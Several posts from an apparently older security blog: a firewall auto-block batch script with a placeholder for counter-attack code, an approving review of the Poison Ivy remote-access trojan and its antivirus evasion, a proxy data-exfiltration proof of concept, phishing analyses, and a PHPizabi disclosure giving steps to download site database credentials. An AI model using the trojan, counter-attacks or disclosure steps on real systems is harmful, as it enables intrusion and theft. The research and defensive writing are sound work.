echo “set any %IP% eq %Port% deny log”  >> fw-rules.txt

echo “wr mem” >> fw-rules.txt

plink USERNAME@HOSTNAME -pw PASSWORD -m fw-rules.txt

>> fw-rules.txt

This code will basically create the firewall rules to deny all connections inbound and outbound to the IP address and port you specified via the variables. Once again the syntax of the rules is not correct but it gives you the insight on what can be done. All you have to do is echo into the fw-rules.txt file any commands you need for your firewall.

To expand this script you can use one other third party tool called “wget” there is a windows port that can be found at http://gnuwin32.sourceforge.net/packages/wget.htm. With this tool you can download lists of blocked IP addresses from different sites on the internet and incorporate it into your script. So if the script detects one of these malicious IP’s are trying to connect to you can auto block it and log it. To do this we can alter the code like this:

@echo off

wget http://somesite.com/ip.txt

:top

for /f %%a in (ip.txt) do call :SubRoutine %%a

goto top

:SubRoutine

for /f “tokens=2″ %%a in (‘netstat -an^|find “%1″‘) do set IPnPort=%%a

for /f “tokens=1-2 delims=:” %%b in (‘echo %IPnPort%’) do (

set IP=%%b

set Port=%%c

)

set IPnPort=

if “%IP%”==”" goto end

if “%Port%”==”" goto end

echo ATTACKER DETECTED from %IP% on Port %Port%

ATTACK CODE GOES HERE

for %%a in (IP Port) do set %%a=

goto end

:end

The code above will download a list of known malicious bad sites and monitor connection attempts from those IP addresses against your computer. It will respond to the connection attempt based on the response you want to use. I have give n you several possible responses throughout this paper though don’t limit yourself to those. Use your imagination to expand on this code to make it work for you.

I want to thank you all for reading this and if you have any questions or comments please feel free to contact me. I also want to give special thanks to RunCmd aka Neil for his killer windows scripting skills and patience in helping me.

Thanks

Michael

A few months ago I wrote for Informit.com and had my buddy Seth Fogie publish my article that I wrote on the BlackBerry Firewall. You can find the article here:

http://www.informit.com/guides/content.aspx?g=security&seqNum=348

A while back I wrote on cached credentials and proxy authentication in regards to spyware. Well I rewrote the paper and cleaned it up a bit. I then had informit.com publish it for me. to see it check out the url below.  This one includes the .net code to make it work.

http://www.informit.com/guides/content.aspx?g=security&seqNum=350

Poison Ivy is a remote access Trojan (Tool) that can be found at the following URL: http://poisonivy-rat.com and a support forum can be found here http://ratforge.net/forums/ . Please note that these are Trojans and www.digitaloffensive.com nor any of its staff are responsible for any use or misuse that you do with these files.

Recently I had the opportunity to take a close look at the poison ivy rat and run it through a real world scenario in a controlled lab environment. The tool comes as a single exe that allows you to build a server executable from variables you select in the GUI configuration under the new server option. Neither the client nor the server was detected by Norton, McAfee, AVG or trend. This may have been that the version I was using was released only a day earlier.  I did find it a bit weird that inside Vmware that it would not run and would constantly crash. This made me think right away that the creator did not want their code analyzed but a quick Google showed that many people had this issue which was quickly fixed by disabling DEP.

One of the biggest reasons I loved this Trojan so much was that it provided us with a shoveled shell / connection. This means that no matter what ports where open inbound on their firewall we were guaranteed access because most of them were not doing egress filtering.  Poison Ivy provided an easy and repeatable server creation process using profiles to easily save and quickly load your favorite configurations. The wizard walks you through each step asking you what you would like to choose. Screen 1 we created our connections which is where we put in the phone home IP or IP’s as well as the shared password. Screen 2 walks you through the install options: IE. Run on startup, place in registry, place in active control, copy itself to folders and more. The third screen provides the advance features options. Here we can change its mutex name so we can run multiple instances of poison ivy on each machine, inject the Trojan into the browser, make it persistent, inject it into running process and my favorite hide in ADS (alternate data streams, thank you Microsoft). The 4th menu allows you to add additional build features such as an external packer to hide it from AV better. The final screen is actual generation of the Trojan server executable.

In the lab we used core impact as well as several other commercial and non commercial exploit tools to gain access to the machines and install poison ivy. Once we had poison ivy installed we were able to view the users screen in near real time by changing the screen shot capture to 5 seconds (don’t suggest doing this over a internet connection), record all the key logs they typed, spawn remote shells, control processes and services as well as countless other things. One of the other real good things it did was to show us in red every place it had hooked in so we can make sure we did not accidentally kill it while killing other processes or files. Once installed poison ivy was able to maintain our access through the day even when it was killed it would re-spawn itself and connect back to us letting us know it was alive.
The only down fall of Poison Ivy was that since it is connect back Trojan the user has the ability to find our IP and to block it in the firewall. Though there are several ways around this. The one that is built into Poison Ivy is to be able to update the code on the fly by replacing the exe with a newly compiled one allowing it to talk back to a new IP or FQDN.

In short I would like to give kudos to the Poison Ivy team for a fine crafted tool and for supplying us several hours of fun while remaining UN detected by AV.

Recently a client of mine and I had a long winded debate about the dangers of not protecting machines from spyware and other malware. The client swore up and down that since they had an authenticating proxy that required the windows cached credentials to access the internet that they were protected. They believed that the proxy prevented the spyware and other malware from being able to phone data home as the spyware would not have access to the cache credentials to access the internet. We spent a lot of time searching for spyware or other malware that were known that could use windows cached credentials and could not find any. The results that we did come up with were articles on how using an authenticating proxy helps cuts down on spyware and other malware as they cannot phone home.  Even though all the data was pointing to me being wrong I knew if it did not currently exist that as spyware evolved it would exist.

Even though I continued to argue my points and tried to provide relevant supporting data to back my concerns up they were still firm that spyware is not an issue. So I set forth to prove them wrong. I remembered back in the day when I use to write applications in Visual Basic that you could make a web browser in just a few minutes. Visual Basic allows you to do this through the web browser component, which uses the Internet Explorer engine. With this in mind I formulated my first theory. The theory was if it used Internet Explorer then it should use cached credentials to authenticate too without the need to steal them or anything else. To test this out I wrote a quick web browser using the web component in Visual Basic. Once I completed the code I disabled the proxy in Internet Explorer to make sure that without that checked I did not have internet access. Once I verified I did not have internet access I launched my web browser that I just coded and witnessed the same thing. With this tested I then re-enabled the proxy settings in Internet Explorer and repeated the test again. This time both Internet Explorer and the web browser I built connected to the internet. With the theory of my web browser using the cached credentials proven correct I moved on to actually sending data out through the proxy /firewall. To accomplish this I decided to use the “http post” command as it will allow me to submit data to a form over port 80 using the http protocol which is allowed through the proxy / firewall for authenticated users. To do this I found an old “shoutbox” script and used “live http headers” for Firefox to see how a post looked. Once I captured the posting header I broke it down in my application into 2 parts. Part one was the post string and part 2 was the data I recorded from user input. Once I clicked the execute button the data was posted to the shoutbox application and my theory was proven fact.

To double verify my theory I ran a second set of tests:

Test 2: Using Raw packet tools to test my theory.

Without firewall rule allowing me to bypass the proxy

C:\>nc -vv xxxx.net 80

DNS fwd/rev mismatch: xxxx.net != lambda.xxxxxxx.com

xxxxx.net [xxx.xxx.xxx.xxx] 80 (http): TIMEDOUT < — Failed

sent 0, rcvd 0: NOTSOCK

As you can see when I have to use the proxy Netcat can’t automatically authenticate to the proxy hence my http connection to xxxxx.net fails.

With firewall rule allowing me to bypass the proxy

C:\>

C:\>nc -vv xxxxx.net 80

DNS fwd/rev mismatch: xxxx.net  != lambda.xxxxxx.com

xxxxxx.net [xxx.xxx.xxx.xxx] 80 (http) open <– Worked

C:\>

As you can see with the rule allowed in the firewall to allow me to bypass the proxy and use the firewall the Netcat application can connect via http to xxxxx.net since it does not have to authenticate.

In the wild a malicious person could use a vulnerability in Internet explorer to download the application and execute it in the background or they could email it to a user and have them run it. The application does not require admin rights all it needs is the ability to use Internet Explorer.

I will upload the POC once I show the company my findings later this week. IP and URL’s have been altered to protect them.

As some of you know my day job has me providing security guidance to a large user base that vary in their technical skills. Every day we get several requests that come in asking us weather something is a scam or phishing attempt and when time allows we do the research.

Today’s phishing question had to do with the following email:

From: Internal Revenue Service (IRS) [mailto: taxrefund@0x6c.3xdb24d6.irs.govThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ]
Sent: Tuesday, May 20, 2008 7:25 AM
Subject: Tax Notification

Internal Revenue Service (IRS)
United States Department of the Treasury

Dear Taxpayer,

After the last annual calculations of your fiscal
activity we have determined that you are eligible
to receive a tax refund of $184.80.

Please submit the tax refund request and allow us
6-9 days in order to process it.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying
after the deadline.

To access the form for your tax refund, use the following personalized link:

http://0x7C.0xDB11D1/www.irs.gov/

Regards,
Internal Revenue Service

Document Reference: (0x7C.0xDB11D1).

I did some quick initial research and replied to the end user with the following information:

From: Internal Revenue Service (IRS) [mailto: taxrefund@0x6c.3xdb24d6.irs.govThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ]
Sent: Tuesday, May 20, 2008 7:25 AM
Subject: Tax Notification

Unfortunately we do not have the full headers here so I cannot confirm or deny the email address above. But I can tell you just looking at it does look real suspicious.

Internal Revenue Service (IRS)
United States Department of the Treasury

Dear Taxpayer,

The IRS knows you and would address you by your full name. IE John Smith  not Dear Taxpayer

After the last annual calculations of your fiscal
activity we have determined that you are eligible
to receive a tax refund of $184.80.

Please submit the tax refund request and allow us
6-9 days in order to process it.

In the past whenever the IRS has owed a individual additional money / rebates they never required additional requests. IE the recent bonus rebates.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying
after the deadline.

To access the form for your tax refund, use the following personalized link:

http://0x7C.0xDB11D1/www.irs.gov/

This web address is bogus. The IRS real site is http://www.irs.gov. If you Google the address you will find these links http://www.google.com/search?hl=en&q=0x7C.0xDB11D1 showing that this is indeed a scam.
According to this site the url no longer works though I do not suggest you click it. http://www.phishtank.com/phish_detail.php?phish_id=448690&frame=site. That link will allow you to see the site in a protective format if you hover over the links on the site you will see that many of them do not go to the IRS site.

It is my believe that the 0x7C.0xDB11D1 is another url encrypted with hexadecimal (a computer language) that basically uses some form of cross site scripting, site spoofing, or redirection to steal your information.

Regards,
Internal Revenue Service

Document Reference: (0x7C.0xDB11D1).

Though the response above works for our end users this interested me so I decided to research this further. I figured looking at the URL that the phishers have came up with a new way or was using an old way that stilled worked to obfuscate the URL.

(Before doing any of the below please make sure you are using a live boot cd or a machine that you do not care about. I am not responsible if you infect yourself.)

So first I wanted to decrypt the URL http://0x7C.0xDB11D1. So using a hexadecimal conversion sheet that I found at http://www.dewassoc.com/support/msdos/decimal_hexadecimal.htm
I was able to translate the obfuscated URL to the IP address 124.219.17.209. You could also decrypt this by using the ping –a command. It will resolve it to the IP address.

Second I used Wire shark to capture traffic to and from the site to see if it used any droppers or scripts for redirection or infection. I did not see anything out of the ordinary.

Third I used Firefox and the Live Http Headers plug-in to capture traffic to and from the site to see if there were any scripts or redirection taken place and I did not see anything.

Fourth I manually analyzed the source code of the http:// 0x7C.0xDB11D1/ and the redirected site codes and did not see anything in the code that was obfuscated or out of the norm. The hacked pages pulled a lot of the IRS images and style sheets to make it look like the real thing but the attacker did an extremely poor job of hiding the URL. The URL clearly is not that of the IRS.

Fifth I manually tried to change the URL instead of using http:// 0x7C.0xDB11D1/www.irs.gov I tried http:// 0x7C.0xDB11D1/www.digitaloffensive.com and I got a page cannot be found error. This makes me believe that on the site http:// 0x7C.0xDB11D1 (124.219.17.209) there is a subfolder called www.irs.gov that has a file in it that does the redirection to random sites. I say random sites because during my analyst of this issue two different redirected hacked URL’s showed up. I tried to mirror the site http:// 0x7C.0xDB11D1 with wget –rm http:// 0x7C.0xDB11D1 but most of the directories cannot be accessed. I even tried to mirror it by doing wget –rm http:// 0x7C.0xDB11D1/www.irs.gov/ and that was able to dl one of the other hacked sites but still not provide the redirection source.

In conclusion this is just another phishing scam where the attackers are relying on human stupidity to click on a link and supply their personal information to the attackers. Please head your IT / IS department warnings about Email scams as they are only trying to protect you from yourself.

Today our director of Internal Audit dropped on my desk a printed email that looked exactly the same as the scam email I wrote about a few weeks ago in the post called “The IRS has partnered up with China to help you get a tax bonus!”. I figured since I had a huge increase in traffic since I did the original story from people searching for what 0x7C.0xDB11D1 was that I would do a follow up to help others out that may be seeing this for the first time.

This time however the amount is no longer 184.80 they are now saying you are entitled to a whopping 284.80 cents an increase of $100.00 dollars.

The URL has changed slightly instead of http://0x7C.0xDB11D1/www.irs.gov/ it is now http://2081062820/www.irs.gov/. The new URL uuencoded is http://124.10.127.164/www.irs.gov/. At the time of this writing it looks like the URL has been removed and is no longer working to con innocent people out of their information. To see how I decoded the URL please read the original story posted here http://www.digitaloffensive.com/index.php?option=com_content&task=view&id=23&Itemid=2 .

The third change was the “Document Reference Number”. In both emails this number was just the obfuscated URL to make it look more official and lend assistance in making the phish fall for the bait easier. In the first mail the “Document Reference Number” was 0x7C.0xDB11D1 and in the second one it was 2081062820.

Once again only way for us to help protect our end users is through constant reminders and training.

The term phishing originated by taking the term fishing, meaning to bait and catch, and using a language of the computer underground where they commonly replace the letter F with PH. Digital criminals use cunning techniques to trick their victims into taking the bait … hook, line and sinker! The victim usually ends up exposing themselves to identity theft, loss of funds and other unpleasant consequences.

Though many companies like PayPal and eBay take many security measures to protect you it’s the human factor, known as Social Engineering, which these predators are counting on. They’re hoping to trick you mentally into believing that they are who they say they are or if you don’t reply bad things will happen.

PayPal has published a list of common email phishing tactics and a list of ways to detect fake emails that can be viewed here:  https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Help/popup/RecognizeSpoof-outside . We strongly suggest that you read this information on PayPal’s website in its entirety, as it is only 3 pages long, but could save you time and money down the road.

Let’s take a look at the following email and see if you can point out the tell-tale signs that it’s a fake. The most important thing to remember, no matter how the email looks, is if you’re unsure of the email’s authenticity manually type in the company’s website and contact them via the phone number found on their site. This assures that you aren’t tricked into a fake site that may contain a fake number.

Another thing to remember is that if you do not have a PayPal account then just delete the email as it‘s definitely a trick.

Here are some tell-tale signs that will help you quickly identify a phishing attempt.

First, the From says PayPal Department but the actual email address is norelay@steelworks.orgThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it .  That’s not from the PayPal domain which should’ve been name@paypal.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it . There are ways to spoof the domain so just because the email has the real domain name don’t base its authenticity on just that.

Second, the message is addressed to Dear PayPal User. Though PayPal, eBay and many other large companies deal with millions, if not billions of people, they’ll always use the name that’s on your account. For example: John Bishop Smith or Jane Y Smith. They will never user a generic greeting.

The third tell-tale sign isn’t very noticeable to the naked eye. If you hover your mouse over the website address Outlook will either show a balloon pop up with the real website that it will take you to, if you clicked it, or it will show the real website address in the Outlook status bar at the bottom of Outlook.

The website address in the pop up doesn’t look like https://www.paypal.com at all! This can also be spoofed through other means to make the pop up show a PayPal website address.

Fourth is the content of the email. The attacker is trying to persuade you with a false sense of urgency to click the link. It’s better to have your account suspended than clicking the link.

To summarize whenever you receive these types of emails it’s best to delete them and contact the company through a manual process to assure that you are not being tricked into falling for a scam. We suggest that you manually type in the PayPal address https://www.paypal.com            to verify any information or call them at 1-888-221-1161.

I provided you with a few tell-tale signs to help protect you from falling victim to these attacks. If you have any questions or concerns please feel free to contact me.

Instant IDS v1.0 is a custom shell script that will automatically download, configure and run Snort IDS and BASE web gui.

Though this script has been tested in-depth I the author do not guarantee it will work and or not harm your system. Since this is a shell script and can be easily edited I strongly suggest that you don’t download it from any site but http://www.digitaloffensive.com. Please note that IDS systems need to configure to properly work in your environment. Until they are tuned you may receive false positives.

This script has been tested in-depth on CentOS 5.0, Fedora Core 7 and Fedora Core 6. This script should work on any other Linux flavor that makes use of yum and chkconfig.

This script currently makes use of the snort 2.7 and the rules that were released with this version. We do not download new rules for you as Snort requires a user account to download newer rules. We strongly suggest that if you like the Snort product that you subscribe to their subscription rule base service to receive new rules faster.

What is needed?

a)      A default install of Linux with gcc (no need to choose http, mysql or anything like that)

b)      A Internet Connection

What Does Instant IDS provide you?

Instant IDS provides you with a fully functional IDS system in minutes. The script will download all needed services, libraries and packages that are needed. It will install and configure each of these items based on the underlying operating system. It will also configure and start the needed services based on user input. Once done it provides you with a fully working IDS system running Snort, MySql and BASE.

What are we planning to do in the future?

Since 96% of the script pulls the newest packages using yum we plan to make sure that we keep the script up to date as new versions of Snort, Base and Libpcap are released. We plan to make the script more customizable by introducing the ability to configure variables. We plan to add more advance means of error checking and improve the code. We also plan to have it lock down the box as much as possible based on user input. With all this said we rely on the users of the script to tell us what they like and don’t like and what they would like us to do in future releases.

How to use Instant IDS

a)      cd /root

b)      wget http://www.digitaloffensive.com/snort/snort.sh

c)       chmod 777 snort.sh

d)      ./snort.sh

e)      Answer the questions that you are prompted with. Please make sure that if you are using a subnet that you enter it as xxx.xxx.xxx.xxx\\/24 ß or whatever class it is.

f)       The wait value you enter will give you some time to make sure there is no show stopping errors, some warning are ok. This is only to be used if there is a major issue and a library or application does not install or compile. If you see a major issue press ctrl +c to cancel the rest of the install.

g)      Once instant IDS is installed we suggest you lock down your machine, here are a few examples:

a.       Firewall the machine.

b.      Disable root ssh access.

c.       Create a mysql root password.

d.      Update the systems patches

e.      Disable unneeded services.

This script is released freely we ask that you keep the original authors information in it though you have right to modify the script as you see necessary. This script may not be sold.

For a recent audit I was tasked with checking a class C network for null sessions. The task itself sounds simple doesn’t it? But I am not one to just run a quick scan without verifying my work. This caused a interesting discovery. My first run at the network I used NTscan and discovered 1 machine with a null session open. If this would of been correct then the client would of definitely improved their security posture since the last audit they had from another company. To verify my work I then ran xscan v3, though I prefer their older versions I could not find a working clean copy in the short time frame I had to use it. This scan returned 3 open machines. Now this was odd but I chalked it up to maybe another machine came up in the time frame it took to run the tools. The third scan I ran with a tool called netscan and this tool not only returned 16 machines open but returned all the drive information with their permissions. Now this totally baffled me, so I ran all three tools one after another and the same results came up. I also manually checked the machines that returned results and each one was indeed open. Now with this in mind I figured the only safest way to confirm what was truly open was to manual test the full class C using net commands. So to this I wrote a simple shell script for CYGWIN to verify the machine was up then to check it for null sessions. The script returned 26 null sessions, which I verified a sampling of them and confirmed my results. The script is attached. The script was not written with the ability to quickly change it with variables as I needed it quickly and did not have time to make it look real pretty. If you would like to customize the script please feel free to do it, or if you need help please feel free to ask.

Part 1:

Verify the node is up: ShareScan: http://genxweb.net/wp-content/uploads/2007/06/shareup.zip

This script will go through a txt file and verify that the ips inside the file are up and if they are up moves it to another file that will be used by the scanner to check for null sessions.

Part 2:

Check for null session: Scan Share: http://genxweb.net/wp-content/uploads/2007/06/scanshare.zip

This script takes the IP addresses that are up from the results from the first part of the script and runs the net use commands on them checking for null sessions. Error checking is basic as we use a simple truth statement && to say if it was mapped successfully then disconnect it.

Side note: I first published this article on my old site http://www.genxweb.net

So I am about to have a garage sale and want to accept credit cards so people can’t say they don’t have money so I search all over the internet and there is nothing in the form of a POS for paypal users. So what do I do I create a down and dirty one using a simple Batch file.

Check out the code below.

Title Yard Sale Pyapal Check Out
@echo off
cls
set /p ItemNo=Item No:
set /p ItemName=Item Name:
set /p Price=Price:
pause

echo ^<form target=”paypal” action=”https://www.paypal.com/cgi-bin/webscr” method=”post”^>>Out.htm
echo ^<input type=”hidden” name=”cmd” value=”_xclick”^>^<input type=”hidden” name=”amount” value=”%Price%”^>>>Out.htm
echo ^<input type=”hidden” name=”business” value=” you@your.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it “^>>>Ou
t.htm
echo ^<input type=”hidden” name=”item_name” value=”%ItemName%”^>>>Out.htm
echo ^<input type=”hidden” name=”item_number” value=”%ItemNo%”^>>>Out.htm
echo ^<input type=”hidden” name=”return” value=”www.divepa.com/thanks.html”^>>>Out.htm
echo ^<input type=”hidden” name=”cbt” value=”Continue”^>>>Out.htm
echo ^<input type=”image” src=”cart.jpeg” border=”0″ name=”submit” alt=”button”^>^</form^>>>Out.htm
echo ^<br^>^<br^> >>out.htm
echo You are purchasing item: %ItemName% for %Price% if you agree click the cart above and complete your transaction >>out.htm

pause
start /max “C:\Program Files\Internet Explorer\iexplore.exe” Out.htm

All you do is copy the above code into a notepad file and save the file as paypal.cmd then double click it and fill in the blanks. Make sure you change the email field first to your paypal email account.

Vendor: Notified. I notified the vendor of this issue over three months ago and have not heard back from them regarding this threat. According to their website there has been no patches or core releases released since the ones I have listed below.

Version: PHPizabi 0.848b C1 HFP1 (Alicia)

Hot fixes: 848 Core HotFix Pack 3 0848bC1_HFP3.zip and below

Product Info:

“More than a simple script, dating script, or even just a matchmaker; PHPizabi is a feature rich social networking platform that integrates everything you need to jumpstart your community, dating site, or social networking portal right out of the box. PHPizabi is one of the most reliable, safe, and solid platforms on the market, offering your users features they could only dream of.”

Vulnerability:

In the default configuration and installation of this script the “system” dir is left open allowing indexing. When I discovered that the system dir was open I was able to download the configuration file that contained sensitive information about the site such as the database connection information including username and password.

To exploit

1)      Google: “Powered by PHPizabi”

2)      http://sitename.com/system/

3)      Download file open in editor.

Temp solutions:

1)      Add a .htacess to the system dir that says

a.       Options –Indexes

b.      Note this will not stop the attacker from using wget and http://sitename.com/system/config.inc.php from retrieving the file.

2)      Make sure that the database can only be accessed local.

a.       The host I had permission to test this on had the database open to remote connections.

Vendor should have the file die if trying to access it directly like they do if you try to access a file in the admin directory directly.

Tested on: This has been tested against my site www.xxxxxxxx.com I have done some edits to the code to protect my site and contacted the host about the database settings. Site address has been “X” out to protect it from people trying the attack against it.

Vulnerability Classification: Possible vulnerability in information disclosure and database integrity.

Thanks

Michael LaSalvia

www.digitaloffensive.com